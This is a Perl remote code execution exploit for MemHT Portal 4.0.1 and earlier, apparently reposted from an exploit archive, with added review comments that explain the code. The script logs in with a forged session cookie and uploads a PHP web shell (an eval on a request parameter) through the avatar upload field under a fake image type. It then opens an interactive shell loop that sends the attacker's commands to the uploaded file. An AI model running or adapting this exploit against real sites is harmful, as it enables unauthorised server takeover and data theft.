MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit
来源:vfocus.net 作者:vfocus 发布时间:2009-02-02  
#!/usr/bin/perl 
# MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit
# by yeat - staker[at]hotmail[dot]it

use Getopt::Std;
use Digest::MD5('md5_hex');
use LWP::UserAgent;


# Command-line handling. -p <proxy> is the only option; Getopt::Std strips
# the options it consumes from @ARGV before the positional arguments are read.
getopts('p:',\my %opts);

# Positional arguments, in the order Main::Usage documents them.
my ($host,$file,$id,$username,$password) = @ARGV;

# Shared HTTP client used by every package in this file (via file-scoped
# lexical). Indirect object syntax ("new Class") is discouraged in Perl;
# LWP::UserAgent->new is the conventional form.
my $http = new LWP::UserAgent;
my $u_agent = "Lynx (textmode)";
# Session cookie in the form the target presumably expects: the user id and
# the MD5 hex digests of the username and password, '#'-separated.
# NOTE(review): a session token built from unsalted digests of the user's
# credentials is itself weak session handling, independent of the upload flaw.
my $cookies = "login_user=$id#".md5_hex($username)."#".md5_hex($password);


# Entry point. The packages below are compiled before this line runs, so the
# forward reference resolves.
Main::RunExploit();


# Main Package

package Main;


sub Usage {

    # Print the usage banner to STDOUT and return print's status (true on
    # success). The banner contains no interpolated variables, so a
    # non-interpolating heredoc yields exactly the same text.
    my $banner = <<'EOF';
+--------------------------------------------------------------+
| MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit |
+--------------------------------------------------------------+
by yeat - staker[at]hotmail[dot]it

Usage: perl xpl.pl host/path file id user pass [OPTIONS]
host: target host and memht path
file: file to upload
user: valid username
pass: valid password
id: user id

Options:

-p [specify a proxy] [server]:[port]

Example: 
perl xpl.pl localhost/memht yeat.php 38 MrJack obscure 
perl xpl.pl localhost/memht yeat.php 38 MrJack obscure -p 213.151.89.109:80

EOF

    return print $banner;
}


sub RunExploit 
{    
    # Driver called at file scope: applies the optional proxy, validates the
    # positional argument count, then logs in and performs the upload.
    # Reads the file-scoped lexicals %opts, $u_agent and $file.
    if (defined $opts{p}) {
        HTTP::Proxy($opts{p});
    }
    
    # NOTE(review): the accepted range of 5..7 arguments is not explained by
    # the code; Usage documents exactly five positional values.
    if (@ARGV < 5 || @ARGV > 7) {
        Main::Usage();
    }
    else { 
        HTTP::UserAgent($u_agent);
        MemHT::Login();     
        MemHT::Exploit($file);
    }    
}




# MemHT Exploit Package

package MemHT;

sub Exploit 
{
    # Submit the profile-edit form with $file in the avatar field and, if the
    # response looks like a logged-in page, loop reading commands from STDIN
    # and relaying them to the uploaded file. Uses the file-scoped $http and
    # $host; exits the process when the upload is not accepted.
    my $resp;
    my $file = shift(@_);
    my $path = "/index.php?page=users&op=editProfile";

    # Multipart form body. The avatar part declares a client-chosen
    # Content-Type of image/jpeg while its body is PHP source. The weakness
    # this demonstrates is presumably that the application trusts that
    # client-supplied type; the mitigation is to validate the upload itself
    # (extension allowlist, content inspection, server-chosen filename) and
    # to store avatars where the web server will not execute them.
    my $data = {
        chg_email => 'yeat@doesntexist.net',
        avatar    => [
                      # undef in the first slot: no local file is read, the
                      # part body comes from the inline Content entry below.
                      undef,
                      $file,
                      Content_Type => 'image/jpeg',
                      Content      => '<?php error_reporting(E_ALL); eval($_REQUEST[\'cmd\']); ?>',
                      # Content => 'Here you can write everything :) this is an example!',
                     ],
        chg       => 'true',
        Submit    => 'Modify',
    };  
    
    my $send = $http->post('http://'.$host.$path,
                           $data,
                           Content_Type => 'multipart/form-data',
                          );
    
    # Success heuristic: the word "logout" anywhere in the whole response
    # (as_string includes status line and headers, not just the body).
    if ($send->as_string =~ m{logout}i) {
        print "File Uploaded! / $host/images/avatar/uploaded/$file\n\n";
        
        # No exit condition: the loop runs until the process is interrupted.
        while (1) {
           print "\n[yeat-PHPshell]:~# ";
           chomp(my $content = <STDIN>);
           $resp = HTTP::GET("$host/images/avatar/uploaded/$file?cmd=$content");
           print $resp->content;
        }                         
    }
    else {
        print "Exploit Failed!\n";
        exit;
    }     
}   
           

sub Login
{
    # Install the precomputed cookie on the shared client and probe a page
    # that needs a session. Only a body containing "access denied" counts as
    # a failed login (the process exits); any other response is accepted.
    # Uses the file-scoped $cookies and $host.
    HTTP::Cookies($cookies);
    my $response = HTTP::GET($host.'/index.php?page=pvtmsg&op=newMessage');
    
    if ($response->content =~ /access denied/i) {
        print "Login Failed!\n";
        exit;
    }
}           
           
                                 

# HTTP Package

package HTTP;


sub Cookies 
{
    # Set the Cookie header sent with every later request on the shared
    # $http client; returns whatever default_header() returns.
    my ($cookie_header) = @_;
    return $http->default_header(Cookie => $cookie_header);
}

sub UserAgent 
{
    # Set the User-Agent string on the shared $http client.
    my ($agent_string) = @_;
    return $http->agent($agent_string);
}    

sub GET 
{    
    # Fetch a URL with the shared client, prefixing 'http://' when the
    # argument does not already carry that scheme. Returns the response.
    my ($url) = @_;
    $url = 'http://' . $url unless $url =~ m{^http://(.+?)$}i;
    return $http->get($url);
}
    
sub POST 
{   
    # Issue a POST without a body to the given URL (scheme added when
    # missing). Only the first argument is used; anything else passed in is
    # dropped. Not called anywhere in this file.
    my ($url) = @_;
    $url = 'http://' . $url unless $url =~ m{^http://(.+?)$}i;
    return $http->post($url);
}
    
sub http_header 
{
    # Pass a single header name to default_header() on the shared client;
    # with one argument that presumably reads the field back rather than
    # setting it. Not called anywhere in this file.
    my ($field_name) = @_;
    return $http->default_header($field_name);
}            
    
sub Proxy 
{
    # Route http-scheme requests from the shared client through the given
    # host:port proxy.
    my ($proxy_hostport) = @_;
    return $http->proxy(http => 'http://' . $proxy_hostport);
}   

# [2009-01-25]

 